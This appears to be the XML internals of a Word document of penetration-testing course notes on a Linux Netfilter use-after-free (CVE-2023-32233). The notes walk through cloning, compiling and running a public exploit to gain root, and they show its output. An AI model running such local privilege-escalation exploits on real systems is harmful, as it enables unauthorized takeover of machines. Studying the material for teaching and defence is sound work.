          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Use-After-Free</w:t>
      </w:r>
      <w:r w:rsidRPr="00334102">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>) so they cannot be used anymore. Due to a mistake in the code, these anonymous sets are not being handled properly and can still be accessed and modified by the program.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65076E7F" w14:textId="77777777" w:rsidR="00334102" w:rsidRPr="00334102" w:rsidRDefault="00334102" w:rsidP="0033410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 xml:space="preserve">The exploitation is done by manipulating the system to use the </w:t>
      </w:r>
      <w:r w:rsidRPr="00334102">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>cleared out</w:t>
      </w:r>
      <w:r w:rsidRPr="00334102">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> anonymous sets to interact with the kernel's memory. By doing so, we can potentially gain </w:t>
      </w:r>
      <w:r w:rsidRPr="00334102">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="00334102">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6926DF64" w14:textId="77777777" w:rsidR="00334102" w:rsidRPr="00334102" w:rsidRDefault="00334102" w:rsidP="0033410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334102">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Proof-Of-Concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1354F6B1" w14:textId="77777777" w:rsidR="00334102" w:rsidRPr="00334102" w:rsidRDefault="00334102" w:rsidP="00334102">
      <w:pPr>
        <w:spacing w:after="0"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 xml:space="preserve">Proof-Of-Concept </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D88A557"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cry0l1t3@ubuntu:~$ git clone https://github.com/Liuk3r/CVE-2023-32233</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3BC78F"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cry0l1t3@ubuntu:~$ cd CVE-2023-32233</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16638155"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cry0l1t3@ubuntu:~/CVE-2023-32233$ gcc -Wall -o exploit exploit.c -lmnl -lnftnl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02655F31" w14:textId="77777777" w:rsidR="00334102" w:rsidRPr="00334102" w:rsidRDefault="00334102" w:rsidP="0033410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334102">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06018EF4" w14:textId="77777777" w:rsidR="00334102" w:rsidRPr="00334102" w:rsidRDefault="00334102" w:rsidP="00334102">
      <w:pPr>
        <w:spacing w:after="0"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 xml:space="preserve">Exploitation </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D5EA4F"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cry0l1t3@ubuntu:~/CVE-2023-32233$ ./exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8A7DA2"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502691F"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Netfilter UAF exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2887C931"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C3E2B19"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Using profile:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7808572A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7304D479"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1                   race_set_slab                   # {0,1}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B582DA8"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1572                race_set_elem_count             # k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DC37B6"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4000                initial_sleep                   # ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B520501"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100                 race_lead_sleep                 # ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5496C091"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600                 race_lag_sleep                  # ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36666646"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100                 reuse_sleep                     # ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116E5EFA"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39d240              free_percpu                     # hex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523E649A"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2a8b900             modprobe_path                   # hex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA6423C"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23700               nft_counter_destroy             # hex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B47CCEB"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347a0               nft_counter_ops                 # hex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8D1408"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a                   nft_counter_destroy_call_offset # hex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B466DBE"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ffffffff            nft_counter_destroy_call_mask   # hex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47ECEF02"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e8e58948            nft_counter_destroy_call_check  # hex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679A0986"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6C45CE"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3BEA76F"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Checking for available CPUs...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642A1E9F"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sched_getaffinity() =&gt; 0 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE596AC"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Reserved CPU 0 for PWN Worker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D22752"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Started cpu_spinning_loop() on CPU 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013B184F"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lastRenderedPageBreak/>
        <w:t>[*] Started cpu_spinning_loop() on CPU 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532045EC"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Started cpu_spinning_loop() on CPU 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1827438F"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Creating "/tmp/modprobe"...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35577534"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Creating "/tmp/trigger"...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773824D4"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Updating setgroups...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE9CA28"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Updating uid_map...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FD452A"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Updating gid_map...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D530D90"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Signaling PWN Worker...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363C14B8"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Waiting for PWN Worker...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F3B4A8"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5665464"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...SNIP...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C0657B"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D0201C3"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You've Got ROOT:-)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310A8D20"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CD4E50E"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 id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E644186"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73279D6" w14:textId="77777777" w:rsidR="00334102" w:rsidRPr="00334102" w:rsidRDefault="00334102" w:rsidP="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334102">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>uid=0(root) gid=0(root) groups=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2678DD83" w14:textId="77777777" w:rsidR="00334102" w:rsidRPr="00334102" w:rsidRDefault="00334102" w:rsidP="0033410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334102">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Please keep in mind that these exploits can be very unstable and can break the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7622333D"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614E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4F58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1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49"/>
    <w:rsid w:val="00144549"/>
    <w:rsid w:val="00213442"/>
    <w:rsid w:val="0033410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510F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{AF913810-A7E3-409A-8AA2-563D12C7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410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4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading4Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00334102"/>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102"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="36"/>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
      <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading4"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00334102"/>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334102"/>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33410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4102"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="windowtitle">
    <w:name w:val="window_title"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00334102"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0033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334102"/>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334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899087">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1109282160">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="893858365">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1481456552">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="19545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628">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1535384102">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="16076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6733">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="502014664">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="17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1539">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="598416919">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="8616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757">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1378771822">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1511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023">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1398624658">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="11874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vedetails.com/cve/CVE-2022-25636/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Liuk3r/CVE-2023-322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qlx/CVE-2022-1015" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/google/security-research/tree/master/pocs/linux/cve-2021-2255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ickgregory.me/post/2022/03/12/cve-2022-25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2023-08-03T10:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-08-03T10:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>